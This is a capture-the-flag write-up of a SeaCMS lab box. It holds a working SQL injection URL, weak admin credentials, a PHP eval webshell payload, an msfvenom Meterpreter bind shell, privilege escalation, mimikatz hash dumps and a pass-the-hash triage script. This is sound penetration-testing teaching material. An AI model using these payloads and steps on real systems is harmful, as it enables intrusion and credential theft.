- Difficulty: Very Easy
- Target: CyberStrike Lab [PT-1]
- Type: Comprehensive Penetration
## Flag1
Information gathering fingerprinted the site as SeaCMS (OceanCMS), and a scan with Wavely turned up a vulnerability. The PoC pointed at the injection point `http://10.0.0.68/js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(4)))v)&type=list`: the `id` parameter is a time-based blind SQL injection (the response stalls for 4 seconds whenever the injected `sleep(4)` runs), which ghauri can exploit automatically:

```shell
ghauri -u 'http://10.0.0.68/js/player/dmplayer/dmku/?ac=del&id=*&type=list' --dbs
```

It was far too slow, however: listing 5 table names took about 20 minutes, because a time-based blind injection recovers data one yes/no request at a time and every "yes" costs a 4-second stall. That is workable in a real engagement, but it should not be the standard way to solve the challenge.
Directory scanning turned up phpMyAdmin, but it had no known vulnerabilities and no weak or empty passwords. A few directory-traversal hits did not lead anywhere useful either, and no configuration information leaked, so code review looked like the next step.
The main admin backend directory, however, was elusive. After a long search I noticed that the site's title was cslab. Initially I assumed every lab carried this title, but it turned out to be a hint: browsing directly to http://10.0.0.68/cslab led to the backend login, and the weak credentials cslab / cslab granted access.
From there, I looked online for known 1day backend GetShell techniques for SeaCMS. Following an article that described the backend GetShell, I set the Access Key under Extensions -> Baidu Push to `";eval($_REQUEST[6]);//` and submitted it. The value is written into a PHP file inside a double-quoted string, so the leading `";` closes that string, `eval($_REQUEST[6]);` becomes live code, and the trailing `//` comments out the rest of the original line. Requesting http://10.0.0.68/data/admin/ping.php?6=phpinfo(); returned the phpinfo page, confirming PHP code execution.
Connecting AntSword to http://10.0.0.68/data/admin/ping.php (the connection password is the parameter name, 6) gave a shell, and flag.txt was sitting in the C:\ root directory.
## Flag2
I didn't understand privilege escalation very well, so I followed the method in this article, which successfully escalated privileges.
```shell
# Generate a 64-bit Meterpreter bind-shell payload: the target listens on TCP 4444
# and msfconsole connects to it (LHOST is ignored by a bind_tcp payload)
msfvenom -p windows/x64/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=4444 -f exe > shell.exe
```

I uploaded and ran shell.exe, then connected to it from msfconsole.
```
$ msfconsole
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf6 exploit(multi/handler) > set rhost 10.0.0.68
rhost => 10.0.0.68
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > run
[*] Started bind TCP handler against 10.0.0.68:4444
[*] Sending stage (203846 bytes) to 10.0.0.68
[*] Meterpreter session 1 opened (172.16.233.2:60932 -> 10.0.0.68:4444) at 2025-04-28 23:25:50 +0800

meterpreter > getsystem
...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:cad8ef0c410c9709cea512052756ce5a:::
ApacheUser:1000:aad3b435b51404eeaad3b435b51404ee:01ef84bcd8079831f0966ac49ae9c0e6:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/
Success.
meterpreter > creds_all
[!] Not running as SYSTEM, execution may fail
meterpreter > getsystem
...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)).
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username       Domain           NTLM                              SHA1
--------       ------           ----                              ----
Administrator  WIN-S4KAS0ERCGQ  cad8ef0c410c9709cea512052756ce5a  947e1029f3fc1ce2f1f6592a1e55844dd3152ea2

wdigest credentials
===================

Username          Domain           Password
--------          ------           --------
(null)            (null)           (null)
Administrator     WIN-S4KAS0ERCGQ  (null)
WIN-S4KAS0ERCGQ$  WORKGROUP        (null)

kerberos credentials
====================

Username          Domain           Password
--------          ------           --------
(null)            (null)           (null)
Administrator     WIN-S4KAS0ERCGQ  (null)
win-s4kas0ercgq$  WORKGROUP        (null)
```
That yields the Administrator NTLM (NT) hash cad8ef0c410c9709cea512052756ce5a, matching the hashdump line above. Two things are worth reading off this output. In the hashdump, aad3b435b51404eeaad3b435b51404ee is the placeholder for an LM hash that is not stored, and 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of an empty password, so DefaultAccount and Guest have no password set. The (null) passwords under wdigest and kerberos are expected on current Windows builds, which no longer keep plaintext logon credentials in LSASS by default; the NT hash, rather than a recovered plaintext, is therefore the credential to carry forward.
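As an added example for reading output like the above (not code from the writeup or from Metasploit), the snippet below parses pwdump-style hashdump lines, flags the two well-known sentinel values, identifies the built-in Administrator by RID 500 regardless of its display name, and formats each account's hashes in the LM:NT form that impacket tools accept via `-hashes`. The hash lines are the ones printed in this writeup; the use of the NT hash for pass-the-hash is a general property of NTLM authentication, not a step the writeup performs.

```python
"""Classify Meterpreter/pwdump-style hashdump output (added example)."""
from dataclasses import dataclass

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # placeholder: LM hash not stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password

# Lines copied from the hashdump output in this writeup.
HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:cad8ef0c410c9709cea512052756ce5a:::
ApacheUser:1000:aad3b435b51404eeaad3b435b51404ee:01ef84bcd8079831f0966ac49ae9c0e6:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""


@dataclass(frozen=True)
class Account:
    user: str
    rid: int
    lm: str
    nt: str

    @property
    def empty_password(self) -> bool:
        return self.nt == EMPTY_NT

    @property
    def lm_stored(self) -> bool:
        # A real LM hash would make this account trivially crackable.
        return self.lm != EMPTY_LM

    @property
    def builtin_admin(self) -> bool:
        # RID 500 is the built-in Administrator even if the account was renamed.
        return self.rid == 500

    def pth_format(self) -> str:
        """LM:NT string in the form impacket's -hashes option expects."""
        return f"{self.lm}:{self.nt}"


def parse_hashdump(text: str) -> list[Account]:
    """Parse `user:rid:lm:nt:::` lines; blank lines are skipped, bad lines rejected."""
    accounts = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        user, rid, lm, nt, *_ = line.split(":")
        if len(lm) != 32 or len(nt) != 32:
            raise ValueError(f"malformed hash line: {line}")
        accounts.append(Account(user, int(rid), lm.lower(), nt.lower()))
    return accounts


def classify(acct: Account) -> str:
    """One-line verdict per account, for triage."""
    if acct.empty_password:
        return "empty password"
    tag = "built-in Administrator, " if acct.builtin_admin else ""
    lm = "LM hash stored" if acct.lm_stored else "LM not stored"
    return f"{tag}NT hash usable for pass-the-hash ({lm})"


def usable_for_pth(accounts: list[Account]) -> list[Account]:
    """Accounts whose NT hash is worth trying: anything that is not the empty-password hash."""
    return [a for a in accounts if not a.empty_password]


if __name__ == "__main__":
    for a in parse_hashdump(HASHDUMP):
        print(f"{a.user:15} rid={a.rid:<5} {classify(a)}")
        if not a.empty_password:
            print(f"{'':15} -hashes {a.pth_format()}")
```

On this host the verdicts are: Administrator and ApacheUser carry usable NT hashes (with no LM hash stored), while DefaultAccount and Guest have the empty-password hash and so nothing to authenticate with; this is the same conclusion the kiwi msv entry reaches for Administrator, which lists the identical NT hash.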